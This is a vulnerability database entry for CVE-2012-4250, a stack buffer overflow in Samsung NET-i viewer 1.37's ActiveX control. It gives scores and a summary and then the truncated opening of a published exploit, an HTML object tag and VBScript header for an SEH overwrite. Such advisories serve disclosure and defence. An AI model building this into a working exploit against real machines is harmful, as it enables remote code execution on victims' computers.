9.3
CVSSv2

CVE-2012-4250

Published: 13/08/2012 Updated: 29/08/2017
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
VMScore: 935
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

Stack-based buffer overflow in the RequestScreenOptimization function in the XProcessControl.ocx ActiveX control in msls31.dll in Samsung NET-i viewer 1.37 allows remote malicious users to execute arbitrary code via a long string in the first argument.

Vulnerable Product Search on Vulmon Subscribe to Product

samsung net-i viewer 1.37

Exploits

<html> <object classid='clsid:FA6E2EA9-D816-4F00-940B-609C9E8847A4' id='target' ></object> <script language='vbscript'> ' Exploit Title: SAMSUNG NET-i viewer ActiveX SEH Overwrite ' Date: April 30 2012 ' Author: Blake ' Software Link: wwwsamsungsecuritycom/product/product_viewasp?idx=5828 ' Version: 137 ' Tested o ...